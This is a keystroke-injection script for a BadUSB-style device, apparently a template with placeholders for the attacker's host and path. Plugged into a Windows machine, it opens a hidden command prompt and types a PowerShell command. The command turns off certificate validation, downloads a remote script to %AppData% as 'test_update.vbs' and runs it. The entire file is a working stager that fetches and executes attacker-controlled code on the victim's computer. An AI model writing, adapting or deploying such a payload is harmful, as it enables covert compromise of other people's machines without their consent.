DELAY 3000
GUI r
DELAY 400
STRING cmd /Q /D /T:01 /F:OFF /V:ON /K
ENTER
DELAY 400
STRING powershell -Command "add-type 'using System.Net;using System.Security.Cryptography.X509Certificates;public clas
STRING s TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(ServicePoint srvPoint, X509Certif
STRING icate certificate, WebRequest request, int certificateProblem) {return true;}}'; [System.Net.ServicePointManage
STRING r]::CertificatePolicy = New-Object TrustAllCertsPolicy;$x=([Reflection.Assembly]::GetAssembly([System.Net.Confi
STRING guration.SettingsSection]))
STRING .GetType('System.Net.Configuration.SettingsSectionInternal');($x.GetField('useUnsafeHeaderParsing',@
STRING ('NonPublic','Instance'))).SetValue(($x.InvokeMember('Section',([Reflection.BindingFlags]'Static,GetProperty,No
STRING nPublic'),$null,$null,@())),$true);[System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProto
STRING colType]'Ssl3,Tls,Tls11,Tls12';(Invoke-WebRequest -Uri '<http_prefix>://<host_and_port><registered_uri_path>').
STRING ToString()|Out-File '%AppData%\test_update.vbs'"
ENTER
DELAY 3000
STRING %AppData%\test_update.vbs
ENTER
